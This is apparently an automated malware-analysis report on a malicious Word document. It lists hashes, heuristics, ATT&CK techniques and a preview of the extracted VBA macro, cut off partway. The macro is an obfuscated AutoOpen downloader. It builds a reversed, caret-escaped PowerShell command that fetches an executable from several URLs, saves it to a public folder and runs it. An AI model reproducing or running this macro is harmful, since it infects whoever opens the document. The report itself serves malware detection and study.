Office (OLE) malware analysis — malicious · fc9b517e4736c522

MALICIOUS

Office (OLE)

71.5 KB Created: 2018-09-17 11:20:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: 510019ae0c78ada79ed01b6f2f45e97e SHA-1: 42f9bf02e9623eb845c25f530739f41360943930 SHA-256: fc9b517e4736c5224a50f3517c76c55e030e865ffd61d8e31c3b4e18d40dccda

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening. The macro attempts to execute a shell command using the Shell function, indicating it's designed to download and run a secondary payload. The obfuscated nature of the script and lack of clear indicators prevent definitive family attribution.

Heuristics 5

ClamAV: Doc.Malware.Generic-6688161-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6688161-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/contentTypeIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributesIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchemaIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/documentManagement/typesIn document text (OLE body)
- http://schemas.microsoft.com/office/infopath/2007/PartnerControlsIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.microsoft.com/sharepoint/v3/contenttype/formsIn document text (OLE body)
- http://schemas.openxmlformats.org/package/2006/metadata/core-propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchema-instanceIn document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://purl.org/dc/terms/In document text (OLE body)
- http://schemas.microsoft.com/internal/obdIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dc.xsdIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dcterms.xsdIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5215 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5215 bytes
SHA-256: `c5cda69df552231321acbf71f7cea31d1d9101b3e52e0621ff9bddcb61fada01`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "OHwBIBFBGvZI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Const OPKMdqmU = 0 Dim wmBMY(4) wmBMY(0) = Left(JnRVpP, 917) wmBMY(1) = Right(CZZRJW, 551) wmBMY(2) = Mid(aNbWGQt, 683, 147) wmBMY(3) = MidB(Wnjwj, 33, 126) Dim zELqih(3) zELqih(0) = Left(JnRVpP, 917) zELqih(1) = Mid(aNbWGQt, 683, 147) zELqih(2) = Left(JnRVpP, 917) Dim UucHM(3) UucHM(0) = Mid(aNbWGQt, 683, 147) UucHM(1) = Left(JnRVpP, 917) UucHM(2) = Right(CZZRJW, 551) Dim CZDYFb(5) CZDYFb(0) = Right(CZZRJW, 551) CZDYFb(1) = Left(JnRVpP, 917) CZDYFb(2) = Left(JnRVpP, 917) CZDYFb(3) = MidB(Wnjwj, 33, 126) CZDYFb(4) = Right(CZZRJW, 551) Dim zhjfrk(5) zhjfrk(0) = Left(JnRVpP, 917) zhjfrk(1) = Mid(aNbWGQt, 683, 147) zhjfrk(2) = Right(CZZRJW, 551) zhjfrk(3) = Right(CZZRJW, 551) zhjfrk(4) = Left(JnRVpP, 917) Shell@ iwJrjiBQDzF + rQwwURAT + EuimrPi, CInt(OPKMdqmU) Dim vPbat(4) vPbat(0) = Left(JnRVpP, 917) vPbat(1) = Right(CZZRJW, 551) vPbat(2) = MidB(Wnjwj, 33, 126) vPbat(3) = Mid(aNbWGQt, 683, 147) Dim BAzlRR(5) BAzlRR(0) = Mid(aNbWGQt, 683, 147) BAzlRR(1) = Right(CZZRJW, 551) BAzlRR(2) = Left(JnRVpP, 917) BAzlRR(3) = Right(CZZRJW, 551) BAzlRR(4) = Left(JnRVpP, 917) End Sub Attribute VB_Name = "OLiLAdbo" Function iwJrjiBQDzF() Dim uhiwPE(3) uhiwPE(0) = Right(CZZRJW, 551) uhiwPE(1) = MidB(Wnjwj, 33, 126) uhiwPE(2) = Left(JnRVpP, 917) Dim JkAGI(2) JkAGI(0) = Left(JnRVpP, 917) JkAGI(1) = Right(CZZRJW, 551) Dim BFXHrm(5) BFXHrm(0) = Mid(aNbWGQt, 683, 147) BFXHrm(1) = MidB(Wnjwj, 33, 126) BFXHrm(2) = Left(JnRVpP, 917) BFXHrm(3) = Right(CZZRJW, 551) BFXHrm(4) = Left(JnRVpP, 917) Dim hOYNbf(5) hOYNbf(0) = Left(JnRVpP, 917) hOYNbf(1) = MidB(Wnjwj, 33, 126) hOYNbf(2) = Mid(aNbWGQt, 683, 147) hOYNbf(3) = MidB(Wnjwj, 33, 126) hOYNbf(4) = Right(CZZRJW, 551) jpIAhkh = Format(Chr(3 + 13 + 15 + 8 + 60)) + "md /V^:O/" + Format(Chr(2 + 9 + 10 + 5 + 41)) + Format(Chr(1 + 4 + 4 + 2 + 23)) + "s^e^t ^sN=" + "^ ^ ^ ^ ^ ^ ^ ^}}^{" + "h" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "t^a" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "}^;^k^a^erb;rVS" + "$^ me^tI^-e" + "k^ovnI;)rVS^$ ^,^PRL^$(" Dim vtFzId(3) vtFzId(0) = Left(JnRVpP, 917) vtFzId(1) = Left(JnRVpP, 917) vtFzId(2) = Left(JnRVpP, 917) EhMwK = "^eli^F^da^o^ln^w^oD^.sz^i$^{" + "^yrt^{)Jf^O^$" + "^ n^i^ PR^L$(h" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "^aer^of^" + ";^'e^x^e.^'+G^sG$+" + "^'\^'^+" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "^il^b^" + "up^:vn^e" + "^$=rVS$;'522'^ =^ ^Gs^" + "G^$^;)'^@'(^t" + "il^p^S^.'^y/ln.^hsu" + "r^e//^:^p^tt" + "^h@^p^e/" + "^m^o" + Format(Chr(3 + 13 + 15 + 8 + 60)) + ".er^" + "oo^m^-s^m^ad^a//:^ptt^h^@x" Dim QzmcS(4) QzmcS(0) = Left(JnRVpP, 917) QzmcS(1) = Right(CZZRJW, 551) QzmcS(2) = Right(CZZRJW, 551) QzmcS(3) = MidB(Wnjwj, 33, 126) iiHzzzcsi = "0f/m^o" + Format(Chr(3 + 13 + 15 + 8 + 60)) + ".dnuorgk" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "a^bs" + "^a^lt^a//" + "^:ptth@^u^e/^m^o" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "^.^avi^taer" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "a^i^h^ab//^:^pt^t^h^@3^d^F^1/" + "^t^en^.b^ewo" + "leve^d//^:p^t^th^'=^JfO" + "^$^;^t" + "ne^il" + Format(Chr(2 + 9 + 10 + 5 + 41)) + "^b^e^W^.t^eN^ ^t" + Format(Chr(3 + 13 + 15 + 8 + 60)) Dim EBSIB(3) EBSIB(0) = MidB(Wnjwj, 33, 126) EBSIB(1) = Mid(aNbWGQt, 683, 147) EBSIB(2) = MidB(Wnjwj, 33, 126) Dim obrhjr(3) obrhjr(0) = MidB(Wnjwj, 33, 126) obrhjr(1) = MidB(Wnjwj, 33, 126) obrhjr(2) = Mid(aNbWGQt, 683, 147) Dim XYLPXa(2) XYLPXa(0) = Right(CZZRJW, 551) XYLPXa(1) = MidB(Wnjwj, 33, 126) fobCvQZnzNA = "e^j^bo^-w^en^=^s^zi^$^ l^l" + "^e^hsr^e^w^op&&^f^or /" + "L %" + Format(Chr(3 + 13 + 15 + 8 + 60)) + " ^in (3^38^;-" + "^1^;0)d^o ^s^e^t 9^" + "w^g=!9^w^" + "g!!^sN:~%" + Format(Chr(3 + 13 + 15 + 8 + 60)) + ",1!&&^if %" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "=" Dim GTOOD(2) GTOOD(0) = ... (truncated)

SHA-256: c5cda69df552231321acbf71f7cea31d1d9101b3e52e0621ff9bddcb61fada01

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "OHwBIBFBGvZI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const OPKMdqmU = 0
   Dim wmBMY(4)
wmBMY(0) = Left(JnRVpP, 917)
wmBMY(1) = Right(CZZRJW, 551)
wmBMY(2) = Mid(aNbWGQt, 683, 147)
wmBMY(3) = MidB(Wnjwj, 33, 126)
   Dim zELqih(3)
zELqih(0) = Left(JnRVpP, 917)
zELqih(1) = Mid(aNbWGQt, 683, 147)
zELqih(2) = Left(JnRVpP, 917)
   Dim UucHM(3)
UucHM(0) = Mid(aNbWGQt, 683, 147)
UucHM(1) = Left(JnRVpP, 917)
UucHM(2) = Right(CZZRJW, 551)
   Dim CZDYFb(5)
CZDYFb(0) = Right(CZZRJW, 551)
CZDYFb(1) = Left(JnRVpP, 917)
CZDYFb(2) = Left(JnRVpP, 917)
CZDYFb(3) = MidB(Wnjwj, 33, 126)
CZDYFb(4) = Right(CZZRJW, 551)
   Dim zhjfrk(5)
zhjfrk(0) = Left(JnRVpP, 917)
zhjfrk(1) = Mid(aNbWGQt, 683, 147)
zhjfrk(2) = Right(CZZRJW, 551)
zhjfrk(3) = Right(CZZRJW, 551)
zhjfrk(4) = Left(JnRVpP, 917)
Shell@ iwJrjiBQDzF + rQwwURAT + EuimrPi, CInt(OPKMdqmU)
   Dim vPbat(4)
vPbat(0) = Left(JnRVpP, 917)
vPbat(1) = Right(CZZRJW, 551)
vPbat(2) = MidB(Wnjwj, 33, 126)
vPbat(3) = Mid(aNbWGQt, 683, 147)
   Dim BAzlRR(5)
BAzlRR(0) = Mid(aNbWGQt, 683, 147)
BAzlRR(1) = Right(CZZRJW, 551)
BAzlRR(2) = Left(JnRVpP, 917)
BAzlRR(3) = Right(CZZRJW, 551)
BAzlRR(4) = Left(JnRVpP, 917)
End Sub


Attribute VB_Name = "OLiLAdbo"
Function iwJrjiBQDzF()
Dim uhiwPE(3)
uhiwPE(0) = Right(CZZRJW, 551)
uhiwPE(1) = MidB(Wnjwj, 33, 126)
uhiwPE(2) = Left(JnRVpP, 917)
   Dim JkAGI(2)
JkAGI(0) = Left(JnRVpP, 917)
JkAGI(1) = Right(CZZRJW, 551)
   Dim BFXHrm(5)
BFXHrm(0) = Mid(aNbWGQt, 683, 147)
BFXHrm(1) = MidB(Wnjwj, 33, 126)
BFXHrm(2) = Left(JnRVpP, 917)
BFXHrm(3) = Right(CZZRJW, 551)
BFXHrm(4) = Left(JnRVpP, 917)
   Dim hOYNbf(5)
hOYNbf(0) = Left(JnRVpP, 917)
hOYNbf(1) = MidB(Wnjwj, 33, 126)
hOYNbf(2) = Mid(aNbWGQt, 683, 147)
hOYNbf(3) = MidB(Wnjwj, 33, 126)
hOYNbf(4) = Right(CZZRJW, 551)
jpIAhkh = Format(Chr(3 + 13 + 15 + 8 + 60)) + "md /V^:O/" + Format(Chr(2 + 9 + 10 + 5 + 41)) + Format(Chr(1 + 4 + 4 + 2 + 23)) + "s^e^t ^sN=" + "^   ^ ^   ^     ^ ^  ^  ^}}^{" + "h" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "t^a" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "}^;^k^a^erb;rVS" + "$^ me^tI^-e" + "k^ovnI;)rVS^$ ^,^PRL^$("
Dim vtFzId(3)
vtFzId(0) = Left(JnRVpP, 917)
vtFzId(1) = Left(JnRVpP, 917)
vtFzId(2) = Left(JnRVpP, 917)
EhMwK = "^eli^F^da^o^ln^w^oD^.sz^i$^{" + "^yrt^{)Jf^O^$" + "^ n^i^ PR^L$(h" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "^aer^of^" + ";^'e^x^e.^'+G^sG$+" + "^'\^'^+" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "^il^b^" + "up^:vn^e" + "^$=rVS$;'522'^ =^ ^Gs^" + "G^$^;)'^@'(^t" + "il^p^S^.'^y/ln.^hsu" + "r^e//^:^p^tt" + "^h@^p^e/" + "^m^o" + Format(Chr(3 + 13 + 15 + 8 + 60)) + ".er^" + "oo^m^-s^m^ad^a//:^ptt^h^@x"
Dim QzmcS(4)
QzmcS(0) = Left(JnRVpP, 917)
QzmcS(1) = Right(CZZRJW, 551)
QzmcS(2) = Right(CZZRJW, 551)
QzmcS(3) = MidB(Wnjwj, 33, 126)
iiHzzzcsi = "0f/m^o" + Format(Chr(3 + 13 + 15 + 8 + 60)) + ".dnuorgk" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "a^bs" + "^a^lt^a//" + "^:ptth@^u^e/^m^o" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "^.^avi^taer" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "a^i^h^ab//^:^pt^t^h^@3^d^F^1/" + "^t^en^.b^ewo" + "leve^d//^:p^t^th^'=^JfO" + "^$^;^t" + "ne^il" + Format(Chr(2 + 9 + 10 + 5 + 41)) + "^b^e^W^.t^eN^ ^t" + Format(Chr(3 + 13 + 15 + 8 + 60))
Dim EBSIB(3)
EBSIB(0) = MidB(Wnjwj, 33, 126)
EBSIB(1) = Mid(aNbWGQt, 683, 147)
EBSIB(2) = MidB(Wnjwj, 33, 126)
   Dim obrhjr(3)
obrhjr(0) = MidB(Wnjwj, 33, 126)
obrhjr(1) = MidB(Wnjwj, 33, 126)
obrhjr(2) = Mid(aNbWGQt, 683, 147)
   Dim XYLPXa(2)
XYLPXa(0) = Right(CZZRJW, 551)
XYLPXa(1) = MidB(Wnjwj, 33, 126)
fobCvQZnzNA = "e^j^bo^-w^en^=^s^zi^$^ l^l" + "^e^hsr^e^w^op&&^f^or /" + "L %" + Format(Chr(3 + 13 + 15 + 8 + 60)) + " ^in (3^38^;-" + "^1^;0)d^o ^s^e^t 9^" + "w^g=!9^w^" + "g!!^sN:~%" + Format(Chr(3 + 13 + 15 + 8 + 60)) + ",1!&&^if %" + Format(Chr(3 + 13 + 15 + 8 + 60)) + "="
Dim GTOOD(2)
GTOOD(0) = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.